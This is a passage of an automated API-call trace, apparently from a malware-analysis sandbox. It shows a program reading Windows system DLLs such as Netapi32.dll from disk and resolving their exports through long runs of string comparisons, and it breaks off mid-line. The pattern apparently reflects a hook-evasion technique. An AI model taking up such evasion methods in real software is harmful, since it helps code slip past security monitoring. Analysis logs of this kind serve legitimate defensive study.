lpString2="DnsApiHeapReset") returned 1 [0211.826] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsApiRealloc") returned 1 [0211.826] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsApiSetDebugGlobals") returned 0 [0211.826] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0211.826] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0211.826] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="AddRefQueryBlobEx") returned 1 [0211.826] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="BreakRecordsIntoBlob") returned 1 [0211.826] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="Coalesce_UpdateNetVersion") returned 1 [0211.826] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="CombineRecordsInBlob") returned 1 [0211.826] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DeRefQueryBlobEx") returned 1 [0211.826] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DelaySortDAServerlist") returned 1 [0211.826] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsAcquireContextHandle_A") returned 1 [0211.826] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsAcquireContextHandle_W") returned 1 [0211.827] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsAllocateRecord") returned 1 [0211.827] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsApiAlloc") returned 1 [0211.827] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsApiAllocZero") returned 1 [0211.827] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsApiFree") returned 1 [0211.827] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsApiHeapReset") returned 1 [0211.827] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsApiRealloc") returned 1 [0211.827] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsApiSetDebugGlobals") returned 1 [0211.827] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsAsyncRegisterHostAddrs") returned 0 [0211.827] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0211.827] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0211.827] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="AddRefQueryBlobEx") returned 1 [0211.827] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="BreakRecordsIntoBlob") returned 1 [0211.827] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="Coalesce_UpdateNetVersion") returned 1 [0211.827] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="CombineRecordsInBlob") returned 1 [0211.827] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DeRefQueryBlobEx") returned 1 [0211.827] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DelaySortDAServerlist") returned 1 [0211.827] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsAcquireContextHandle_A") returned 1 [0211.827] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsAcquireContextHandle_W") returned 1 [0211.827] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsAllocateRecord") returned 1 [0211.828] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsApiAlloc") returned 1 [0211.828] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsApiAllocZero") returned 1 [0211.828] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsApiFree") returned 1 [0211.828] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsApiHeapReset") returned 1 [0211.828] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsApiRealloc") returned 1 [0211.828] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsApiSetDebugGlobals") returned 1 [0211.828] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsAsyncRegisterHostAddrs") returned 1 [0211.828] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsAsyncRegisterInit") returned 0 [0211.828] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0211.828] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0211.828] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="AddRefQueryBlobEx") returned 1 [0211.828] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="BreakRecordsIntoBlob") returned 1 [0211.828] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="Coalesce_UpdateNetVersion") returned 1 [0211.828] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="CombineRecordsInBlob") returned 1 [0211.828] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DeRefQueryBlobEx") returned 1 [0211.828] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DelaySortDAServerlist") returned 1 [0211.828] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsAcquireContextHandle_A") returned 1 [0211.828] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsAcquireContextHandle_W") returned 1 [0211.828] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsAllocateRecord") returned 1 [0211.828] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsApiAlloc") returned 1 [0211.828] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsApiAllocZero") returned 1 [0211.828] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsApiFree") returned 1 [0211.828] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsApiHeapReset") returned 1 [0211.828] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsApiRealloc") returned 1 [0211.828] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsApiSetDebugGlobals") returned 1 [0211.828] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsAsyncRegisterHostAddrs") returned 1 [0211.829] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsAsyncRegisterInit") returned 1 [0211.829] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsAsyncRegisterTerm") returned 0 [0211.829] lstrcmpA (lpString1="DnsCancelQuery", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0211.829] lstrcmpA (lpString1="DnsCancelQuery", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0211.829] lstrcmpA (lpString1="DnsCancelQuery", lpString2="AddRefQueryBlobEx") returned 1 [0211.829] lstrcmpA (lpString1="DnsCancelQuery", lpString2="BreakRecordsIntoBlob") returned 1 [0211.829] lstrcmpA (lpString1="DnsCancelQuery", lpString2="Coalesce_UpdateNetVersion") returned 1 [0211.829] lstrcmpA (lpString1="DnsCancelQuery", lpString2="CombineRecordsInBlob") returned 1 [0211.829] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DeRefQueryBlobEx") returned 1 [0211.829] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DelaySortDAServerlist") returned 1 [0211.829] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsAcquireContextHandle_A") returned 1 [0211.829] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsAcquireContextHandle_W") returned 1 [0211.829] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsAllocateRecord") returned 1 [0211.829] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsApiAlloc") returned 1 [0211.829] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsApiAllocZero") returned 1 [0211.829] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsApiFree") returned 1 [0211.829] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsApiHeapReset") returned 1 [0211.829] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsApiRealloc") returned 1 [0211.829] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsApiSetDebugGlobals") returned 1 [0211.829] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsAsyncRegisterHostAddrs") returned 1 [0211.829] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsAsyncRegisterInit") returned 1 [0211.829] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsAsyncRegisterTerm") returned 1 [0211.829] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsCancelQuery") returned 0 [0211.830] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0211.830] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0211.830] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="AddRefQueryBlobEx") returned 1 [0211.830] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="BreakRecordsIntoBlob") returned 1 [0211.830] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="Coalesce_UpdateNetVersion") returned 1 [0211.830] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="CombineRecordsInBlob") returned 1 [0211.830] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DeRefQueryBlobEx") returned 1 [0211.830] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DelaySortDAServerlist") returned 1 [0211.830] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsAcquireContextHandle_A") returned 1 [0211.830] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsAcquireContextHandle_W") returned 1 [0211.830] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsAllocateRecord") returned 1 [0211.830] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsApiAlloc") returned 1 [0211.830] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsApiAllocZero") returned 1 [0211.830] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsApiFree") returned 1 [0211.830] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsApiHeapReset") returned 1 [0211.830] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsApiRealloc") returned 1 [0211.830] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsApiSetDebugGlobals") returned 1 [0211.830] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsAsyncRegisterHostAddrs") returned 1 [0211.843] GetProcessHeap () returned 0x4a0000 [0211.843] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x3a8d010 | out: hHeap=0x4a0000) returned 1 [0211.844] GetProcessHeap () returned 0x4a0000 [0211.844] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x10) returned 0x4b91a0 [0211.845] LoadLibraryA (lpLibFileName="Netapi32.dll") returned 0x7ffc5cb30000 [0212.258] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0212.258] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0212.258] GetModuleFileNameA (in: hModule=0x7ffc5cb30000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\Netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll")) returned 0x20 [0212.258] CreateFileA (lpFileName="C:\\Windows\\system32\\Netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0212.259] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0212.259] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0212.259] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=80640) returned 1 [0212.259] GetProcessHeap () returned 0x4a0000 [0212.259] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13b00) returned 0x2d55030 [0212.259] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0212.259] ReadFile (in: hFile=0x17c, lpBuffer=0x2d55030, nNumberOfBytesToRead=0x13b00, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x2d55030*, lpNumberOfBytesRead=0x14f5a4*=0x13b00, lpOverlapped=0x0) returned 1 [0212.260] CloseHandle (hObject=0x17c) returned 1 [0212.260] lstrcmpA (lpString1="NetAccessAdd", lpString2="DavAddConnection") returned 1 [0212.261] lstrcmpA (lpString1="NetAccessAdd", lpString2="DavDeleteConnection") returned 1 [0212.261] lstrcmpA (lpString1="NetAccessAdd", lpString2="DavFlushFile") returned 1 [0212.261] lstrcmpA (lpString1="NetAccessAdd", lpString2="DavGetExtendedError") returned 1 [0212.261] lstrcmpA (lpString1="NetAccessAdd", lpString2="DavGetHTTPFromUNCPath") returned 1 [0212.261] lstrcmpA (lpString1="NetAccessAdd", lpString2="DavGetUNCFromHTTPPath") returned 1 [0212.261] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsAddressToSiteNamesA") returned 1 [0212.261] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsAddressToSiteNamesExA") returned 1 [0212.261] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsAddressToSiteNamesExW") returned 1 [0212.261] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsAddressToSiteNamesW") returned 1 [0212.261] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsDeregisterDnsHostRecordsA") returned 1 [0212.261] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsDeregisterDnsHostRecordsW") returned 1 [0212.261] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsEnumerateDomainTrustsA") returned 1 [0212.261] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsEnumerateDomainTrustsW") returned 1 [0212.261] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcCloseW") returned 1 [0212.261] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcNameA") returned 1 [0212.261] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcNameW") returned 1 [0212.261] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcNameWithAccountA") returned 1 [0212.262] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcNameWithAccountW") returned 1 [0212.262] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcNextA") returned 1 [0212.262] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcNextW") returned 1 [0212.262] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcOpenA") returned 1 [0212.262] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcOpenW") returned 1 [0212.262] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcSiteCoverageA") returned 1 [0212.262] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcSiteCoverageW") returned 1 [0212.262] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetForestTrustInformationW") returned 1 [0212.262] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetSiteNameA") returned 1 [0212.262] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetSiteNameW") returned 1 [0212.262] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsMergeForestTrustInformationW") returned 1 [0212.262] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsRoleFreeMemory") returned 1 [0212.262] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsRoleGetPrimaryDomainInformation") returned 1 [0212.262] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsValidateSubnetNameA") returned 1 [0212.262] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsValidateSubnetNameW") returned 1 [0212.262] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserDebugCall") returned 1 [0212.262] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserDebugTrace") returned 1 [0212.262] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserQueryEmulatedDomains") returned 1 [0212.262] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserQueryOtherDomains") returned 1 [0212.263] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserQueryStatistics") returned 1 [0212.263] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserResetNetlogonState") returned 1 [0212.263] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserResetStatistics") returned 1 [0212.263] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserServerEnum") returned 1 [0212.263] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserSetNetlogonState") returned 1 [0212.263] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_DsUpdateReadOnlyServerDnsRecords") returned 1 [0212.263] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetAccountDeltas") returned 1 [0212.263] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetAccountSync") returned 1 [0212.263] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetChainSetClientAttributes") returned 1 [0212.263] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetChainSetClientAttributes2") returned 1 [0212.263] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetDatabaseDeltas") returned 1 [0212.263] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetDatabaseRedo") returned 1 [0212.263] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetDatabaseSync") returned 1 [0212.264] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetDatabaseSync2") returned 1 [0212.264] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetDfsGetVersion") returned 1 [0212.264] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetDfsIsThisADomainName") returned 1 [0212.264] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetGetDCList") returned 1 [0212.264] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetGetForestTrustInformation") returned 1 [0212.264] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonControl") returned 1 [0212.264] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonControl2") returned 1 [0212.264] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonGetDomainInfo") returned 1 [0212.264] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonSamLogoff") returned 1 [0212.264] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonSamLogon") returned 1 [0212.264] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonSamLogonEx") returned 1 [0212.264] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonSamLogonWithFlags") returned 1 [0212.264] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonSendToSam") returned 1 [0212.264] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonUasLogoff") returned 1 [0212.264] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonUasLogon") returned 1 [0212.264] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerAuthenticate") returned 1 [0212.264] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerAuthenticate2") returned 1 [0212.265] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerAuthenticate3") returned 1 [0212.265] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerGetTrustInfo") returned 1 [0212.265] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerPasswordGet") returned 1 [0212.265] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerPasswordSet") returned 1 [0212.265] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerPasswordSet2") returned 1 [0212.265] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerReqChallenge") returned 1 [0212.265] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerSetServiceBits") returned 1 [0212.265] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerSetServiceBitsEx") returned 1 [0212.265] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerTrustPasswordsGet") returned 1 [0212.265] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetlogonComputeClientDigest") returned 1 [0212.265] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetlogonComputeServerDigest") returned 1 [0212.311] lstrcmpA (lpString1="NetAccessAdd", lpString2="NetAccessAdd") returned 0 [0212.311] lstrcmpA (lpString1="NetAccessDel", lpString2="DavAddConnection") returned 1 [0212.311] lstrcmpA (lpString1="NetAccessDel", lpString2="DavDeleteConnection") returned 1 [0212.311] lstrcmpA (lpString1="NetAccessDel", lpString2="DavFlushFile") returned 1 [0212.312] lstrcmpA (lpString1="NetAccessDel", lpString2="DavGetExtendedError") returned 1 [0212.312] lstrcmpA (lpString1="NetAccessDel", lpString2="DavGetHTTPFromUNCPath") returned 1 [0212.312] lstrcmpA (lpString1="NetAccessDel", lpString2="DavGetUNCFromHTTPPath") returned 1 [0212.312] lstrcmpA (lpString1="NetAccessDel", lpString2="DsAddressToSiteNamesA") returned 1 [0212.312] lstrcmpA (lpString1="NetAccessDel", lpString2="DsAddressToSiteNamesExA") returned 1 [0212.312] lstrcmpA (lpString1="NetAccessDel", lpString2="DsAddressToSiteNamesExW") returned 1 [0212.312] lstrcmpA (lpString1="NetAccessDel", lpString2="DsAddressToSiteNamesW") returned 1 [0212.312] lstrcmpA (lpString1="NetAccessDel", lpString2="DsDeregisterDnsHostRecordsA") returned 1 [0212.312] lstrcmpA (lpString1="NetAccessDel", lpString2="DsDeregisterDnsHostRecordsW") returned 1 [0212.312] lstrcmpA (lpString1="NetAccessDel", lpString2="DsEnumerateDomainTrustsA") returned 1 [0212.312] lstrcmpA (lpString1="NetAccessDel", lpString2="DsEnumerateDomainTrustsW") returned 1 [0212.312] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcCloseW") returned 1 [0212.312] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcNameA") returned 1 [0212.312] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcNameW") returned 1 [0212.312] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcNameWithAccountA") returned 1 [0212.312] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcNameWithAccountW") returned 1 [0212.312] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcNextA") returned 1 [0212.312] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcNextW") returned 1 [0212.312] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcOpenA") returned 1 [0212.312] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcOpenW") returned 1 [0212.312] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcSiteCoverageA") returned 1 [0212.312] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcSiteCoverageW") returned 1 [0212.312] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetForestTrustInformationW") returned 1 [0212.312] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetSiteNameA") returned 1 [0212.312] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetSiteNameW") returned 1 [0212.313] lstrcmpA (lpString1="NetAccessDel", lpString2="DsMergeForestTrustInformationW") returned 1 [0212.313] lstrcmpA (lpString1="NetAccessDel", lpString2="DsRoleFreeMemory") returned 1 [0212.313] lstrcmpA (lpString1="NetAccessDel", lpString2="DsRoleGetPrimaryDomainInformation") returned 1 [0212.313] lstrcmpA (lpString1="NetAccessDel", lpString2="DsValidateSubnetNameA") returned 1 [0212.313] lstrcmpA (lpString1="NetAccessDel", lpString2="DsValidateSubnetNameW") returned 1 [0212.313] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserDebugCall") returned 1 [0212.313] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserDebugTrace") returned 1 [0212.313] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserQueryEmulatedDomains") returned 1 [0212.313] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserQueryOtherDomains") returned 1 [0212.313] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserQueryStatistics") returned 1 [0212.313] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserResetNetlogonState") returned 1 [0212.313] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserResetStatistics") returned 1 [0212.313] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserServerEnum") returned 1 [0212.313] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserSetNetlogonState") returned 1 [0212.313] lstrcmpA (lpString1="NetAccessDel", lpString2="I_DsUpdateReadOnlyServerDnsRecords") returned 1 [0212.313] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetAccountDeltas") returned 1 [0212.313] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetAccountSync") returned 1 [0212.313] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetChainSetClientAttributes") returned 1 [0212.313] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetChainSetClientAttributes2") returned 1 [0212.313] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetDatabaseDeltas") returned 1 [0212.314] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetDatabaseRedo") returned 1 [0212.314] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetDatabaseSync") returned 1 [0212.314] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetDatabaseSync2") returned 1 [0212.314] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetDfsGetVersion") returned 1 [0212.314] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetDfsIsThisADomainName") returned 1 [0212.314] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetGetDCList") returned 1 [0212.314] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetGetForestTrustInformation") returned 1 [0212.314] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonControl") returned 1 [0212.314] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonControl2") returned 1 [0212.314] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonGetDomainInfo") returned 1 [0212.314] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonSamLogoff") returned 1 [0212.314] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonSamLogon") returned 1 [0212.314] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonSamLogonEx") returned 1 [0212.314] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonSamLogonWithFlags") returned 1 [0212.314] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonSendToSam") returned 1 [0212.314] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonUasLogoff") returned 1 [0212.314] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonUasLogon") returned 1 [0212.314] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerAuthenticate") returned 1 [0212.314] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerAuthenticate2") returned 1 [0212.314] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerAuthenticate3") returned 1 [0212.314] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerGetTrustInfo") returned 1 [0212.314] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerPasswordGet") returned 1 [0212.314] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerPasswordSet") returned 1 [0212.315] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerPasswordSet2") returned 1 [0212.315] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerReqChallenge") returned 1 [0212.315] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerSetServiceBits") returned 1 [0212.315] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerSetServiceBitsEx") returned 1 [0212.315] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerTrustPasswordsGet") returned 1 [0212.315] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetlogonComputeClientDigest") returned 1 [0212.315] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetlogonComputeServerDigest") returned 1 [0212.315] lstrcmpA (lpString1="NetAccessDel", lpString2="NetAccessAdd") returned 1 [0212.315] lstrcmpA (lpString1="NetAccessDel", lpString2="NetAccessDel") returned 0 [0212.315] lstrcmpA (lpString1="NetAccessEnum", lpString2="DavAddConnection") returned 1 [0212.315] lstrcmpA (lpString1="NetAccessEnum", lpString2="DavDeleteConnection") returned 1 [0212.315] lstrcmpA (lpString1="NetAccessEnum", 